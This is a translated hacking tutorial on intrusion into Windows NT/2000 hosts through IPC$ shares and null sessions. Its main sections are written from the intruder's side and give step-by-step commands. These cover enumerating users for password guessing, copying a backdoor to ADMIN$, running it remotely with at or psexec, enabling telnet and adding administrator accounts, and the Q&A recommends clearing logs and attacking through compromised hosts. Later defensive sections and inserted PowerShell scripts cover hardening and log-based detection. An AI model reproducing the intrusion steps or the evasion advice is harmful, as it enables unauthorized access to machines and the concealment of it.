Contents
One. Summary
Two. What is IPC$
Three. What is a null session
Four. What a null session can do
Five. The ports used by IPC$
Six. IPC pipes in hacking attacks
Seven. Common reasons for IPC$ connection failure
Eight. Reasons for copy failure
Nine. About the AT command and XP's limits on IPC$
Ten. How to open the target's IPC$ and other shares
Eleven. Commands that need a shell
Twelve. Commands that may be used in an intrusion
Thirteen. Comparison of past and present IPC$ intrusion
Fourteen. How to prevent IPC$ intrusion
Fifteen. IPC$ intrusion Q&A
One. Summary
Note: everything discussed here applies to the Windows NT/2000 environment. Win98 is not discussed.
Two. What is IPC$
IPC$ (Internet Process Connection) is a shared resource of the "named pipe" kind. It is a named pipe opened for inter-process communication: by supplying a trusted username and password, the two connecting parties establish a secure channel and exchange encrypted data over it, and this is how a remote computer is accessed. IPC$ is a new feature of NT/2000, and it has one peculiarity: only one connection is allowed between two IP addresses at the same time. While providing IPC$, NT/2000 also opens the default shares, that is, all logical drives (C$, D$, E$ ...) and the system directory WINNT or Windows (ADMIN$). Microsoft's intention with all of this was to make administration convenient, but unintentionally it also lowered system security. We often hear people talk about the "IPC$ vulnerability". In fact IPC$ is not a real vulnerability; I think whoever says this must be referring to Microsoft's own "back door": the null session. So what is a null session?
Three. What is a null session
Before introducing the null session, we need to understand how a secure session is established. In Windows NT 4.0 a challenge/response protocol is used to establish a session with a remote machine. A successfully established session becomes a secure tunnel through which the two parties exchange information. The process is roughly as follows: 1) the session requester (client) sends a packet to the session receiver (server) asking for a secure tunnel to be established; 2) the server generates a random 64-bit number (the challenge) and sends it back to the client; 3) the client takes the 64-bit number generated by the server, encrypts it with the password of the account it is trying to establish the session with, and returns the result to the server (the response); 4) after receiving the response, the server hands it to the Local Security Authority (LSA), and the LSA verifies the response using the user's correct password, thereby confirming the requester's identity. If the requester's account is a local account on the server, verification is done locally; if it is a domain account, the response is forwarded to a domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and sent to the client. The client then uses this access token to connect to resources on the server until the session is terminated. That is the rough process by which a secure session is established. So what is a null session?
A null session is a session established with the server without trust, that is, without providing a username and password. Under the Win2000 access control model, establishing a null session also yields a token, but since no user information was authenticated while it was being established, this token contains no user information, so the session cannot be used by the system to send encrypted information. That does not mean the null session's token contains no security identifier (SID, which identifies the user and group). For a null session the SID of the token provided by the LSA is S-1-5-7, the SID of the null session, and the username is ANONYMOUS LOGON (this username can be seen in the user list, but it is not found in the SAM database). This access token contains the following groups: Everyone and Network. Within the limits set by the security policy, these two groups are granted access. So what can be done once a null session is established?

Four. What a null session can do
For NT, with the default security settings, a null connection lets you list the users and shares on the target host, access shares with Everyone permission, access a small part of the registry, and so on; there is not much to exploit. For 2000 the role is even smaller, because in Windows 2000 and later only Administrators and Backup Operators have the right to access the registry over the network, and there are no convenient tools for it.
From this it may seem that such an untrusted session is of no use, but in a complete IPC$ intrusion the null session is an indispensable springboard, because it lets us obtain the user list, and most weak-password scanning tools use this user list to guess passwords. Successfully exporting the user list greatly raises the success rate of the intrusion. This alone is enough to show the safety hazard a null session poses, so null sessions are not useless. The following are some specific commands that can be used in a null session:
1 First, establish a null connection (of course this requires the target to have IPC$ open). Command: net use \\ip\ipc$ "" /user:"" Note: the command above contains four spaces: one between net and use, one after use, and one on each side of the password.
2 View the remote host's shared resources. Command: net view \\ip Explanation: after establishing the null connection, use this command to view the remote host's shared resources. If shares are open, you get a result like the following; note that this command cannot display the default shares.
    Shared resources at \\*.*.*.*

    Share name   Type   Used as   Comment
    ---------------------------------------------------------
    NETLOGON     Disk             Logon server share
    SYSVOL       Disk             Logon server share
    The command completed successfully.
3 View the remote host's current time. Command: net time \\ip Explanation: use this command to get the remote host's current time.
4 Get the NetBIOS name list (requires your own NBT to be enabled). Command: nbtstat -a ip This gets the NetBIOS name table of the remote host and returns results like the following:
    Node IpAddress: [*.*.*.*] Scope Id: []

               NetBIOS Remote Machine Name Table

           Name               Type         Status
        ---------------------------------------------
        SERVER         <00>  UNIQUE      Registered
        OYAMANISHI-H   <00>  GROUP       Registered
        OYAMANISHI-H   <1C>  GROUP       Registered
        SERVER         <20>  UNIQUE      Registered
        OYAMANISHI-H   <1B>  UNIQUE      Registered
        OYAMANISHI-H   <1E>  GROUP       Registered
        SERVER         <03>  UNIQUE      Registered
        OYAMANISHI-H   <1D>  UNIQUE      Registered
        ..__MSBROWSE__.<01>  GROUP       Registered
        INet~Services  <1C>  GROUP       Registered
        IS~SERVER......<00>  UNIQUE      Registered

        MAC Address = 00-50-8B-9A-2D-37
The above is what we commonly do with null sessions. It seems like a lot, but pay attention to one thing: establishing an IPC$ connection leaves a record in the event log, whether or not it succeeds. OK, now let's look at the ports used by IPC$.
Five. The ports used by IPC$
First some basic knowledge: 1 SMB (Server Message Block): the Windows protocol for file and print sharing services; 2 NBT (NetBIOS over TCP/IP): uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to implement NetBIOS networking on top of TCP/IP; 3 in Windows NT, SMB is implemented on top of NBT, i.e. it uses port 139 (TCP); in Windows 2000, besides running over NBT, SMB can also run directly over port 445.
With this basic knowledge we can further discuss which ports are used when accessing network shares:
For a Win2000 client (the initiating side): 1 If NBT is enabled on the client, when it connects to the server it tries ports 139 and 445 at the same time. If port 445 responds, it sends an RST packet to port 139 to break off that connection and uses port 445 for the session; if port 445 does not respond, it uses port 139; if neither port responds, the session fails. 2 If NBT is disabled on the client, it only tries port 445; if port 445 does not respond, the session fails.
For a Win2000 server: 1 If NBT is enabled, UDP ports 137 and 138 and TCP ports 139 and 445 are open; 2 If NBT is disabled, only port 445 is open.
The IPC$ sessions we establish follow the same rules. Obviously, if the remote server is not listening on port 139 or 445, an IPC$ session cannot be created.
Six. IPC pipes in hacking attacks
The IPC pipe was designed by Microsoft to make remote management convenient for administrators, but from the intruder's point of view a host with the IPC pipe open seems easier to break into. Through the IPC pipe we can call some system functions remotely (mostly through tools, and only with appropriate permissions), which is often the key to whether an intrusion succeeds or fails. Even leaving that aside and looking only at file transfer, the IPC pipe gives the intruder enormous support and has even become the most important means of transfer, which is why you can always see people on the big forums fighting over the target machine's IPC pipe. Of course, we should not exaggerate the role of the IPC pipe: if you have only tasted the embarrassment of a null session with no permissions, it will not help you. But once the intruder has obtained administrator permissions, the IPC pipe shows its double-edged nature.

Seven. Common reasons for IPC$ connection failure
The following are common reasons why an IPC$ connection fails:
1 The IPC connection is a feature unique to Windows NT and above; because it needs many DLL functions of Windows NT, it cannot run on Windows 9.x/ME. That is, only NT/2000/XP can establish IPC$ connections with each other; 98/ME cannot establish an IPC$ connection;
2 To create an IPC$ connection, the responding side must have IPC$ sharing enabled; even a null connection is no exception. If the responder has turned off IPC$, the connection cannot be established;
3 The initiating side has not started the LanmanWorkstation service (display name: Workstation): it provides network connections and communication; without it the initiator cannot send a connection request;
4 The responding side has not started the LanmanServer service (display name: Server): it provides RPC support, file, print and named-pipe sharing; IPC$ relies on this service, and without it the host cannot respond to the initiator's connection request, although it can still initiate IPC$ connections itself;
5 The responding side has not started Netlogon, which supports pass-through account logon for computers (this situation is rare);
6 The responder's ports 139 and 445 are not listening or are blocked by a firewall;
7 The initiator has not opened ports 139 and 445;
8 Wrong username or password: the system will give an error prompt such as 'unknown username or bad password' (obviously a null session is exempt from this error);
9 The command was typed wrong: there may be one backslash too many or too few. When the username and password contain no spaces the double quotes can be omitted; if the password is empty, just type two quotes "";
10 If the other side restarts its computer while the connection is established, the IPC$ connection is automatically disconnected and must be re-established.
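The checklist above can be run mechanically from the administrator's side. The following script is an added example, not code from the original article: it checks the initiator's Workstation service, whether the responder is reachable on TCP 445 and 139, the responder's Server and Netlogon services (reasons 3 to 7 in the list), and whether this client already holds a session to the host (the cause of error 1219 discussed further down). It assumes Windows PowerShell 5.1 with the NetTCPIP module (Windows 8/Server 2012 or later); the host name used in the call is a placeholder.

```powershell
# Added example (not from the original article): verify the prerequisites the
# article lists for an IPC$ session, from the administrator's own workstation.
# Assumes Windows PowerShell 5.1 (Get-Service -ComputerName is absent in PS 7)
# and the NetTCPIP module for Test-NetConnection.
function Test-IpcPrerequisites {
    param(
        [Parameter(Mandatory)] [string] $ComputerName
    )
    $result = [ordered]@{}

    # Initiator side (reason 3): the Workstation service must be running.
    $ws = Get-Service -Name LanmanWorkstation -ErrorAction SilentlyContinue
    $result['LocalWorkstationRunning'] = [bool]($ws -and $ws.Status -eq 'Running')

    # Responder side (reasons 6/7): TCP 445 and 139 must be listening and reachable.
    foreach ($port in 445, 139) {
        $tnc = Test-NetConnection -ComputerName $ComputerName -Port $port -WarningAction SilentlyContinue
        $result["RemotePort$port"] = $tnc.TcpTestSucceeded
    }

    # Responder side (reasons 4/5): Server and Netlogon services. Querying them
    # needs RPC access to the host; report 'unknown' when that fails.
    foreach ($svc in 'LanmanServer', 'Netlogon') {
        try {
            $s = Get-Service -ComputerName $ComputerName -Name $svc -ErrorAction Stop
            $result["Remote$svc"] = $s.Status.ToString()
        } catch {
            $result["Remote$svc"] = 'unknown (RPC query failed)'
        }
    }

    # Error 1219 cause: a session to this host already exists from this client.
    $existing = net use 2>$null | Select-String -SimpleMatch "\\$ComputerName\"
    $result['ExistingSessionToHost'] = [bool]$existing

    [pscustomobject]$result
}

# Placeholder host name; replace with the server being checked.
Test-IpcPrerequisites -ComputerName 'fileserver01.example.local' | Format-List
```

Each field maps to one of the numbered reasons above, so a failed field points directly at the service to start or the port to unblock rather than at the generic "System error 53" the net command prints.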
In addition, you can analyze the cause from the error number that is returned:
Error 5, Access is denied: the user is not an administrator;
Error 51, Windows cannot find the network path: there is a network problem;
Error 53, The network path was not found: wrong IP address, the target is not booted, the target's LanmanServer service is not started, or the target has a firewall (port filtering);
Error 67, The network name cannot be found: your LanmanWorkstation service is not started, or the target has deleted IPC$;
Error 1219, The credentials supplied conflict with an existing set of credentials: you already have an IPC$ connection to the other side; delete it and reconnect;
Error 1326, Unknown username or bad password: the reason is obvious;
Error 1792, An attempt was made to log on, but the network logon service was not started: the target's Netlogon service is not started;
Error 2242, The password of this user has expired: the target has an account policy that forces regular password changes.

Eight. Reasons for copy failure
Some friends have successfully established an IPC$ connection but run into trouble when copying: the copy fails. So what are the common causes of copy failure?
1 The other side has no open shared folder. This error accounts for more than 50% of cases. Many friends do not know whether the other side has a shared folder after the IPC$ connection is made, and then the copy fails and they are depressed. So I suggest you always use the net view \\ip command before copying, to check that the shared folder you want to copy to exists (using software to look is of course even better). Do not assume that because an IPC$ connection was established a shared folder must exist.
2 Copying to the default shares fails. This type of error is also common, mainly in two respects:
1) Wrongly assuming that a host you have an IPC$ connection to will always have the default shares open, so you immediately copy files to C$, D$ and ADMIN$; once the other side has not enabled the default shares, the copy fails. IPC$ succeeding only shows that the other side has IPC$ sharing open; it does not mean the default shares must exist. IPC$ sharing and default sharing are two different things: IPC$ is a named pipe, not any actual folder, while the default shares are real shared folders;
2) Since the net view \\ip command cannot display the default shared folders (because their names end in $), we cannot tell whether the other side has the default shares open, so if it does not, all operations on the default shares will fail (but most scanning software can scan for the default shares while scanning for passwords, which avoids this kind of error).
Important: please distinguish three things: IPC$ sharing, default sharing and ordinary sharing. IPC$ sharing is a pipe, not an actual shared folder; the default shares are folders shared by default at installation; ordinary shares are the shared folders we open ourselves, on which permissions can be set.
3 Insufficient user privileges, covering four cases: 1) when copying to any share (default or ordinary), the privileges are insufficient; 2) when copying to the default shares, in Win2000 Pro only members of the Administrators and Backup Operators groups can access these shared directories, and in Win2000 Server also the Server Operators group; 3) when copying to an ordinary share you must have the corresponding permission (that is, the other side's administrator must have set access in advance); 4) the other side may use a firewall or security software that prohibits external access to shares. Do not assume that an administrator can always access an ordinary shared folder: as shown in Figure 6, if the administrator sets the share on drive D so that only the user named xinxin has full access, then even with administrator privileges you still cannot access drive D. What is interesting is that if the other side has the default share D$ open, then you can access D$, which bypasses the permission limit; interested friends can test this themselves.
4 There is also the case of being killed by a firewall, or of the target being inside a LAN: that is, your copy operation may have succeeded, but when the file is run remotely the firewall kills it, so the file is gone; or you copied a Trojan to a host inside a LAN and it fails to connect (that case is outside this discussion). If you don't think of this you will believe there was a problem with the copy, when in fact the copy succeeded and only the execution failed.
Oh, everyone knows that IPC$ connections run into all sorts of problems in practice; these are just some common mistakes. If I have missed any, everyone can remind me.
Nine. About the AT command and XP's limits on IPC$
Originally I wanted to explain why the AT command fails to run programs remotely, but considering that the success rate of AT is not high and it has many problems, I won't go into it here (the more I mention it, the more people use it). Instead I recommend running programs with psexec.exe. Suppose you want the remote machine to run the local file C:\xinxin.exe, the administrator account is administrator and the password is 1234; then enter the following command: psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe If an IPC connection has already been established, the -u and -p parameters are not needed. psexec.exe will automatically copy the file to the remote machine and run it.
I did not want to discuss IPC$ on XP here; I wanted to treat it separately, but I see more and more friends are anxious about it, and most of their operations are hard to make succeed, so I will briefly mention it. In XP's default security options, any remote access is only given Guest privileges; that is, even if you use the administrator account and password, the permissions you get are only Guest, so most operations fail for insufficient permissions, and so far there is no good way to break through this limit. So if you really have an XP administrator password, I suggest you avoid the IPC pipe.

Ten. How to open the target's IPC$ and other shares
The target's IPC$ is not easy to open; otherwise the world would be in chaos. You need a shell with admin privileges, such as Telnet, a Trojan or cmd, and then execute under that shell: net share ipc$ opens the target's IPC$ share; net share ipc$ /del closes the target's IPC$ share. If you want to open a shared folder, use: net share xinxin=c:\ This shares its C drive under the share name xinxin. (But I find that many people wrongly think the command to open a share is net share c$, which is a big misconception handed down to newbies; it really is a misunderstanding.) To repeat: these operations can only be done under a shell.

Eleven. Commands that need a shell
I see that many tutorials are very inaccurate in this area: commands that need a shell are shown being run directly under an IPC$ connection, which is misleading. So here I summarize the commands that must be done under a shell:
1 Creating a user on the remote host, activating a user, changing a user's password and adding a user to the administrators group must be done under a shell;
2 Opening the remote host's IPC$ share, default shares or ordinary shares must be done under a shell;
3 Starting/stopping services on the remote host must be done under a shell;
4 Starting/killing processes on the remote host also needs a shell (except with software such as pskill).
Twelve. Commands that may be used in an intrusion
For the completeness of this tutorial, I list some commands commonly used in IPC$ intrusion; if you have already mastered them, skip this part and read on. Note that each of these commands applies either locally or remotely; a command that only applies locally can only be run against the remote host after you obtain its shell (such as cmd, Telnet, etc.).
1 Commands to create/delete an IPC$ connection
1) Establish a null connection: net use \\127.0.0.1\ipc$ "" /user:""
2) Establish a non-null connection: net use \\127.0.0.1\ipc$ "password" /user:"username"
3) Delete the connection: net use \\127.0.0.1\ipc$ /del
2 Commands that operate on the remote host over IPC$
1) View the remote host's shared resources (without default shares): net view \\127.0.0.1
2) View the remote host's current time: net time \\127.0.0.1
3) Get the NetBIOS name list from the remote host: nbtstat -a 127.0.0.1
4) Map/remove a remote share: net use z: \\127.0.0.1\c This maps the share named c to drive Z:.
net use z: /del removes the mapped Z drive; other drive letters likewise.
5) Copy a file to the remote host: copy path\filename \\ip\sharename, e.g. copy c:\xinxin.exe \\127.0.0.1\c$ copies xinxin.exe from your C drive to the other side's C drive; you can also copy files from the remote host to your own machine: copy \\127.0.0.1\c$\xinxin.exe c:\
6) Add a scheduled task remotely: at \\ip time program, e.g. at \\127.0.0.0 11:00 xinxin.exe Note: the time uses the 24-hour clock; if the program to run is in the system's default search path (such as system32\) no path is needed, otherwise the path must be given.
3 Local commands
1) View the local host's shared resources (the local default shares are visible): net share
2) Get the user list from the local host: net user
3) Show the account information of a user: net user accountname
4) Show the services currently running on the local host: net start
5) Start/stop a local service: net start servicename / net stop servicename
6) Add an account: net user accountname password /add
7) Activate a disabled user: net user accountname /active:yes
8) Add an account to the administrators group: net localgroup administrators accountname /add
Obviously, although these are local commands, once you are inside the remote host's shell (for example, you enter them after your Telnet login succeeds), these "local" commands act on the remote host.
4 Other commands
1) Telnet: telnet ip port, e.g. telnet 127.0.0.0 23
2) Change Telnet's NTLM authentication with opentelnet.exe: opentelnet.exe \\ip administrator-account password NTLM-auth-mode port, e.g. opentelnet.exe \\127.0.0.1 administrator "" 1 90 But this little tool has four requirements: 1) the target has IPC$ sharing open; 2) you have the administrator account and password; 3) the target has the RemoteRegistry service running, so that the user can change NTLM authentication; 4) it only works on Win2K/XP.
3) Get a shell with psexec.exe (requires the IPC pipe): psexec.exe \\ip -u administrator-account -p password cmd, e.g. psexec.exe \\127.0.0.1 -u administrator -p "" cmd
Thirteen. Comparison of past and present IPC$ intrusion
For the comparison, I will first write out the past IPC$ intrusion steps for everyone; they are quite classic:
[1] C:\>net use \\127.0.0.1\ipc$ "" /user:administrators Establish the null connection
[2] C:\>net view \\127.0.0.1 View the remote shared resources
[3] C:\>copy srv.exe \\127.0.0.1\admin$\system32 Copy the one-time backdoor srv.exe to the other side's system folder; the premise is that ADMIN$ is open
[4] C:\>net time \\127.0.0.1 View the remote host's current time
[5] C:\>at \\127.0.0.1 time srv.exe Run srv.exe remotely with the AT command; requires the other side's 'Task Scheduler' service to be running
[6] C:\>net time \\127.0.0.1 View the current time again to estimate whether srv.exe has run; this step can be omitted
[7] C:\>telnet 127.0.0.1 99 Open a new window and telnet to 127.0.0.1 to get a shell (don't know what a shell is? Think of it as control of the remote machine, operated like DOS); port 99 is the port opened by the one-time backdoor srv.exe
[8] C:\WINNT\system32>net start telnet In the shell we just obtained, start the Telnet service; after all srv.exe is a one-time backdoor, and we need a lasting backdoor for future access. If the other side's Telnet is already started, this step can be omitted
[9] C:\>copy ntlm.exe \\127.0.0.1\admin$\system32 In the original window, copy ntlm.exe, which is used to change Telnet authentication
[10] C:\WINNT\system32>ntlm.exe Run ntlm.exe in the shell window; afterwards you can telnet to this host without obstruction
[11] C:\>telnet 127.0.0.1 23 Telnet to 127.0.0.1 in a new window; port 23 can be omitted. Now we have a long-term backdoor
[12] C:\WINNT\system32>net user accountname password /add
C:\WINNT\system32>net user guest /active:yes
C:\WINNT\system32>net localgroup administrators accountname /add
After telnetting in, you can create a new account, activate guest, add any account to the administrators group, and so on.
OK, writing this I feel I have gone back two or three years; back then everyone used IPC$ like this, but with the emergence of new tools some of the tools and commands above are no longer commonly used. Now let's look at today's efficient and simple IPC$ intrusion.
[1] psexec.exe \\ip -u administrator-account -p password cmd With this tool we get the shell in one step
opentelnet.exe \\server administrator-account password NTLM-auth-mode port With this it is easy to change Telnet's authentication mode and port so that we can log in
[2] There is no second step. After getting a shell you can do anything: use winshell, clone accounts, open 3389 with 3389.vbe, record passwords with win2kpass; in short there are plenty of good tools, I have made my choice and won't say more.
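Section four notes that every IPC$ connection, successful or not, leaves a record in the event log, and the classic walkthrough above creates accounts, adds them to Administrators and schedules tasks. The following script is an added example (not code from the original article) that pulls exactly those traces from the local Security log, from the defender's side. It assumes the Windows Vista/Server 2008 or later event IDs (4624 network logon, 4720 user created, 4732 member added to a local group, 4698 scheduled task created) and that auditing of Logon, User Account Management, Security Group Management and Other Object Access events is enabled; run it elevated on the host being examined.

```powershell
# Added example (not from the original article): list the Security-log traces
# left by IPC$ sessions (including null sessions) and by the follow-on actions
# from the classic walkthrough. Assumes Vista/2008+ event IDs and auditing enabled.

function ConvertFrom-EventData {
    # Turn the <EventData><Data Name=...> elements of one event into a hashtable.
    param([System.Diagnostics.Eventing.Reader.EventRecord] $Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
    $data
}

function Get-IpcIntrusionTraces {
    param([int] $Hours = 24)
    $since  = (Get-Date).AddHours(-$Hours)
    $filter = @{ LogName = 'Security'; Id = 4624, 4720, 4732, 4698; StartTime = $since }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $d = ConvertFrom-EventData $_
        switch ($_.Id) {
            4624 {
                # LogonType 3 is a network logon, which is what an IPC$ session is.
                # TargetUserName 'ANONYMOUS LOGON' is the null session (SID S-1-5-7).
                if ($d.LogonType -ne '3') { return }
                [pscustomobject]@{
                    Time   = $_.TimeCreated
                    Kind   = if ($d.TargetUserName -eq 'ANONYMOUS LOGON') { 'NullSession' } else { 'NetworkLogon' }
                    Detail = "$($d.TargetUserName) from $($d.IpAddress) via $($d.AuthenticationPackageName)"
                }
            }
            4720 {
                [pscustomobject]@{ Time = $_.TimeCreated; Kind = 'UserCreated'
                                   Detail = "$($d.TargetUserName) created by $($d.SubjectUserName)" }
            }
            4732 {
                [pscustomobject]@{ Time = $_.TimeCreated; Kind = 'AddedToLocalGroup'
                                   Detail = "$($d.MemberSid) added to $($d.TargetUserName) by $($d.SubjectUserName)" }
            }
            4698 {
                [pscustomobject]@{ Time = $_.TimeCreated; Kind = 'ScheduledTaskCreated'
                                   Detail = "$($d.TaskName) by $($d.SubjectUserName)" }
            }
        }
    } | Sort-Object Time
}

Get-IpcIntrusionTraces -Hours 48 | Format-Table -AutoSize
```

A NullSession row followed within minutes by NetworkLogon rows for many different account names from the same IpAddress is the password-guessing pattern section four warns about; a NetworkLogon followed by UserCreated, AddedToLocalGroup and ScheduledTaskCreated from the same source is the walkthrough above as it appears on the server.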
Fourteen. How to prevent IPC$ intrusion
1 Prohibit null-connection enumeration (this does not block the establishment of null connections)
Run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and change the value RestrictAnonymous = DWORD:1. If set to 1, an anonymous user can still connect to the IPC$ share but cannot use the connection to list SAM accounts and share information; the value 2 was added in Windows 2000, and with it an unauthorized anonymous user cannot connect to IPC$ at all. 1 is recommended. If the value does not exist, create it. If you do not feel comfortable editing the registry, you can set this item in Local Security Settings: Local Security Settings - Local Policies - Security Options - 'Additional restrictions for anonymous connections'.
2 Prohibit the default shares
1) View the local shared resources: Run - cmd - type net share
2) Delete the shares (after a restart the default shares still exist):
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are e, f, ... continue deleting)
3) Stop the Server service: net stop server /y (it is enabled again after a restart)
4) Prohibit automatic creation of the default shares (this does not close IPC$ sharing): Run - regedit
Server version: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the value AutoShareServer (DWORD) to 0.
Pro version: find the same key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the value AutoShareWks (DWORD) to 0. These two values do not exist by default and must be added manually; restart the machine for them to take effect.
3 Close the Server service that IPC$ and the default shares depend on. If you really want to close IPC$ sharing, disable the Server service: Control Panel - Administrative Tools - Services - find the Server service - right-click - Properties - General - Startup type - select Disabled. There may be a prompt that service XXX will also be stopped and whether to continue; that is because some secondary services depend on the Server service; ignore it.
4 Block ports 139 and 445. Since IPC$ cannot be established without these two ports, blocking ports 139 and 445 also prevents IPC$ intrusion.
1) Port 139 can be blocked locally by disabling NBT: TCP/IP properties - Advanced - WINS - select 'Disable NetBIOS over TCP/IP'
2) Port 445 can be blocked by adding a value to the registry: Hive: HKEY_LOCAL_MACHINE, Key: System\CurrentControlSet\Services\NetBT\Parameters, Name: SMBDeviceEnabled, Type: REG_DWORD, Value: 0. Restart the machine after the change. Note: if you block these two ports, you also cannot use IPC$ to intrude on others.
3) Install a firewall and do port filtering
5 Set complex passwords to prevent passwords from being brute-forced through IPC$. I think this is the best method: raising security awareness is safer than any amount of settings.
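The five measures above can be applied and audited from one script. The following is an added example, not code from the original article: it reads the current state of the values the article names (RestrictAnonymous, AutoShareServer, AutoShareWks, SMBDeviceEnabled), the special shares and the Server service, and applies the hardening on request. It assumes an elevated Windows PowerShell 5.1 session on Windows 8/Server 2012 or later, where the SmbShare, NetSecurity and CimCmdlets modules are available; the firewall rule name is my own choice, and the rule is created for the Public profile only, because blocking 139/445 on the Domain profile would break normal file sharing.

```powershell
# Added example (not from the original article): audit and apply the IPC$
# hardening steps from section fourteen. Requires an elevated session.
$Lsa    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$LanSrv = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$NetBt  = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters'
$RuleName = 'Block inbound SMB 139/445'   # name chosen for this example

function Get-IpcHardeningState {
    # $null means the value is absent; for AutoShare* that is the default
    # (the admin shares are created) and for RestrictAnonymous it means 0.
    $read = { param($Path, $Name) (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name }
    [pscustomobject]@{
        RestrictAnonymous = & $read $Lsa 'RestrictAnonymous'
        AutoShareServer   = & $read $LanSrv 'AutoShareServer'
        AutoShareWks      = & $read $LanSrv 'AutoShareWks'
        SMBDeviceEnabled  = & $read $NetBt 'SMBDeviceEnabled'
        SpecialShares     = (Get-SmbShare | Where-Object { $_.Special }).Name -join ','
        ServerStartType   = (Get-Service -Name LanmanServer).StartType.ToString()
        NetBiosDisabled   = -not (Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
                                  Where-Object { $_.TcpipNetbiosOptions -ne 2 })
        FirewallBlock     = [bool](Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue)
    }
}

function Set-IpcHardening {
    param(
        [ValidateSet(1, 2)] [int] $RestrictAnonymous = 1,   # the article recommends 1
        [switch] $DisableAdminShares,
        [switch] $DisableNetBios,
        [switch] $BlockSmbPorts
    )
    # Step 1: stop anonymous enumeration of accounts and shares.
    Set-ItemProperty -Path $Lsa -Name RestrictAnonymous -Type DWord -Value $RestrictAnonymous

    if ($DisableAdminShares) {
        # Step 2: set both values so the setting holds on Server and Workstation SKUs;
        # they take effect after the Server service or the machine restarts.
        New-ItemProperty -Path $LanSrv -Name AutoShareServer -PropertyType DWord -Value 0 -Force | Out-Null
        New-ItemProperty -Path $LanSrv -Name AutoShareWks    -PropertyType DWord -Value 0 -Force | Out-Null
        # Remove the drive and ADMIN$ shares that exist now. IPC$ is left in place
        # here because remote management (and this script's own CIM/RPC calls) need it.
        Get-SmbShare | Where-Object { $_.Special -and $_.Name -ne 'IPC$' } |
            ForEach-Object { Remove-SmbShare -Name $_.Name -Force }
    }

    if ($DisableNetBios) {
        # Step 4.1: disable NetBIOS over TCP/IP (closes 137-139); option 2 = disable.
        Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' | ForEach-Object {
            Invoke-CimMethod -InputObject $_ -MethodName SetTcpipNetbios `
                -Arguments @{ TcpipNetbiosOptions = [uint32]2 } | Out-Null
        }
    }

    if ($BlockSmbPorts -and -not (Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue)) {
        # Step 4.2/4.3: a firewall rule instead of SMBDeviceEnabled=0; it is
        # reversible, needs no reboot, and is scoped to the Public profile.
        New-NetFirewallRule -DisplayName $RuleName -Direction Inbound -Protocol TCP `
            -LocalPort 139, 445 -Action Block -Profile Public | Out-Null
    }
    Get-IpcHardeningState
}

Get-IpcHardeningState                                                        # before
Set-IpcHardening -RestrictAnonymous 1 -DisableAdminShares -DisableNetBios -BlockSmbPorts   # after
```

Run Get-IpcHardeningState alone first; it changes nothing and shows which of the article's steps are already in place. Setting the Server service to Disabled (step 3) is deliberately not automated, because it also removes IPC$ and with it every form of remote administration over SMB; make that change by hand only on hosts that do not need to be managed remotely.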
Fifteen. IPC$ intrusion Q&A
1. When intruding over IPC$, a record is left on the server. Is there any way to keep the server from finding it?
A: A record is definitely left. You can delete it with a log-clearing program, or intrude through a compromised host (a "broiler").
2. Look at this situation: I can connect but I cannot copy. net use \\***.***.***.***\ipc$ "password" /user:"username" The command completed successfully. copy icmd.exe \\***.***.***.***\admin$ The network path was not found. The command was unsuccessful.
A: Errors like "The network path was not found" and "The network name cannot be found" are mostly because you are copying to a shared folder the other side has not opened, so the copy gives an error; try looking for other shared folders.
3. If the other side has IPC$ open and a null connection can be established, but opening the C or D drive asks for a password, I know I do not have much permission, but is there really nothing else? A: Try guessing the password with Fluxay (流光) or other scanning software. If you cannot guess it, you can only give up; after all, what a null session can get is limited.
4. I have guessed the administrator's password and connected successfully, but net view \\ip shows that the default shares are not open. What should I do?
A: First, correct your mistake: net view \\ip cannot show the default shares. Try copying a file to C$ or D$ and see; if that fails, it means the default shares are closed, and you can then use opentelnet.exe or psexec.exe, usage as above.
5. After connecting successfully I used the following command to create an account, but the account appeared on my own machine. What is going on? net user ccbirds /add
A: Establishing IPC$ only shows that you have set up a communication tunnel with the remote host; it does not mean you have a shell. Only after getting a shell can you create an account on the remote machine; otherwise your operation is done locally.
6. I got into a compromised host with the administrator account; I can see its system time, but I cannot copy programs to it; every time it says "Access is denied, 0 file(s) copied". Does the other side have some service running? What should I do?
A: Generally "Access is denied" is the result of insufficient permission. It may be a problem with the account you are using, or, if you are copying to an ordinary shared folder and get this error, the folder's settings do not allow you access (even as an administrator); this was analyzed earlier.
7. Can I use Win98 to establish an IPC$ connection to the other side?
A: In theory, no. For IPC$ operations I recommend Win2000; other operating systems bring a lot of unnecessary trouble.
8. I used net use \\ip\ipc$ "" /user:"" to successfully establish a null session, but nbtstat -a ip cannot export the user list. Why?
A: A null session can export the user list by default, but if the administrator has disabled that by modifying the registry you get what you describe; it is also possible that your own NBT is not enabled, since the nbtstat command relies on NBT.
9. When establishing IPC$ I get "The credentials supplied conflict with an existing set of credentials". What is going on?
A: This shows you have already established an IPC$ connection to the target host; two IPC$ connections between the same two hosts are not allowed.
10. When mapping I get: f:\>net use h: \\211.161.134.*\e$ System error 85 has occurred. The local device name is already in use. What is going on?
A: You are too careless; this shows you already have an H drive. Map to another drive letter!
